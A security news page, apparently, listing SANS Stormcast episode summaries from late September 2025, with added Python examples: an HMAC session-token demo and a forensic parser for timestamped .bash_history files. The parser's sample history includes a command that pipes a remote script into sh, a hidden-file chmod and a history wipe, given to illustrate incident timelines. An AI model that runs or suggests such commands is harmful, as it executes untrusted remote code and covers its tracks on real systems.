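    if data.get("exp", 0) <= now:
        return None
    return data.get("u")


if __name__ == "__main__":
    print("weak handler believes:", weak_current_user("user=admin; theme=dark"))
    token = issue_session("alice", ttl_seconds=60)
    print("signed token verifies as:", verify_session(token))
    forged = issue_session("admin").split(".")[0] + "." + token.split(".")[1]
    print("forged payload with alice's MAC verifies as:", verify_session(forged))
```

The token should still be set with HttpOnly, Secure and SameSite attributes, and a server-side session store lets you revoke a token before it expires; the signature alone only stops forgery and tampering.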

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Tuesday, September 30th, 2025: Apple Patch; PAN Global Protect Scans; SSL.com signed malware

Sep 30, 2025 (duration 5:06)


Apple Patches. Apple released patches for iOS, macOS, and visionOS, fixing a single font parsing vulnerability. https://isc.sans.edu/diary/Apple%20Patches%20Single%20Vulnerability%20CVE-2025-43400/32330

Increase in Scans for Palo Alto GlobalProtect Vulnerability (CVE-2024-3400). Our honeypots detected an increase in scans for a Palo Alto GlobalProtect vulnerability. https://isc.sans.edu/diary/Increase%20in%20Scans%20for%20Palo%20Alto%20Global%20Protect%20Vulnerability%20%28CVE-2024-3400%29/32328

Nimbus Manticore / Charming Kitten Malware Update. Check Point released a report with details regarding a new Nimbus Manticore exploit kit. The malware in this case uses valid SSL.com-issued certificates. https://research.checkpoint.com/2025/nimbus-manticore-deploys-new-malware-targeting-europe/

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Monday, September 29th, 2025: Convert Timestamps; Cisco Compromises; GitHub Notification Phishing

Sep 29, 2025 (duration 8:36)


Converting Timestamps in .bash_history. Unix shells offer the ability to add timestamps to commands in the .bash_history file. This is often done in the form of Unix timestamps. This new tool converts these timestamps into a more readable format. https://isc.sans.edu/diary/New%20tool%3A%20convert-ts-bash-history.py/32324

Cisco ASA/FTD Compromises. Exploitation of the vulnerabilities Cisco patched last week may have gone back about a year. Cisco and CISA have released advisories with help identifying affected devices. https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_continued_attacks https://www.cisa.gov/news-events/directives/ed-25-03-identify-and-mitigate-potential-compromise-cisco-devices

GitHub Notification Phishing. GitHub notifications are used to impersonate Y Combinator and trick victims into installing a crypto drainer. https://www.bleepingcomputer.com/news/security/github-notifications-abused-to-impersonate-y-combinator-for-crypto-theft/
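For the .bash_history item: with HISTTIMEFORMAT set, bash stores each command's time as a '#<epoch seconds>' line immediately before the command, which is why a raw history file looks like alternating comment lines and commands. The block below is an added example written for this page, not the ISC convert-ts-bash-history.py tool; SAMPLE is a constructed history. The pairing rule it implements (a '#' line that is all digits is a timestamp for the command that follows; anything else is a command, and a command with no preceding timestamp line was recorded before the variable was set) is bash's documented history file behaviour.

```python
"""Parse a .bash_history written with HISTTIMEFORMAT set (added example, not the
ISC tool). SAMPLE is a constructed history."""
import sys
from datetime import datetime, timezone
from typing import List, Optional, Tuple

# With HISTTIMEFORMAT set, bash writes "#<epoch seconds>" on the line before each
# command. Entries recorded before the variable was set have no such line.
SAMPLE = """#1759300000
curl -fsSL http://example.invalid/x.sh | sh
#1759300042
chmod +x /tmp/.x
ls -la
#1759300100
history -c
"""

Entry = Tuple[Optional[int], str]   # (epoch seconds or None, command line)


def parse_history(text: str) -> List[Entry]:
    """Pair each command with the epoch from the preceding '#<digits>' line
    (None when absent). A '#' line that is not all digits is a comment command."""
    entries: List[Entry] = []
    pending: Optional[int] = None
    for line in text.splitlines():
        if line.startswith("#") and line[1:].isdigit():
            pending = int(line[1:])
            continue
        entries.append((pending, line))
        pending = None
    return entries


def render(entries: List[Entry], tz=timezone.utc) -> List[str]:
    """Format entries as 'YYYY-mm-dd HH:MM:SS TZ  command' lines, in the given
    zone (UTC by default so timelines from several hosts line up)."""
    rows = []
    for epoch, cmd in entries:
        if epoch is None:
            when = f"{'(no timestamp)':<23}"
        else:
            when = datetime.fromtimestamp(epoch, tz).strftime("%Y-%m-%d %H:%M:%S %Z")
        rows.append(f"{when}  {cmd}")
    return rows


if __name__ == "__main__":
    # Usage: python this_file.py [/path/to/.bash_history]; no argument uses SAMPLE.
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE
    print("\n".join(render(parse_history(text))))
```

The "history -c" at the end of the sample is the kind of line this view makes obvious: with the timestamps rendered, the gap between the download and the history wipe is readable at a glance, which a bare list of commands does not give you.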

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Friday, September 26th, 2025: Webshells in .well-known; Critical Cisco Vulns Exploited; XCSSET Update; GoAnywhere MFT Exploit Details

Sep 26, 2025 (duration 6:52)


Webshells Hiding in .well-known Places. Our honeypots registered an increase in scans for URLs in the .well-known directory, which appear to be looking for webshells. https://isc.sans.edu/diary/Webshells%20Hiding%20in%20.well-known%20Places/32320

Cisco Patches Critical Exploited Vulnerabilities. Cisco released updates addressing already-exploited vulnerabilities in the VPN web server for the ASA and FTD appliances. https://sec.cloudapps.cisco.com/security/center/resources/asa_ftd_continued_attacks https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-YROOTUW

XCSSET Evolves Again. Microsoft detected a new XCSSET variant, an infostealer infecting Xcode projects. https://www.microsoft.com/en-us/security/blog/2025/09/25/xcsset-evolves-again-analyzing-the-latest-updates-to-xcssets-inventory/

Exploitation of Fortra GoAnywhere MFT CVE-2025-10035. watchTowr analyzed the latest GoAnywhere MFT vulnerability and exploits used against it. https://labs.watchtowr.com/it-is-bad-exploitation-of-fortra-goanywhere-mft-cve-2025-10035-part-2/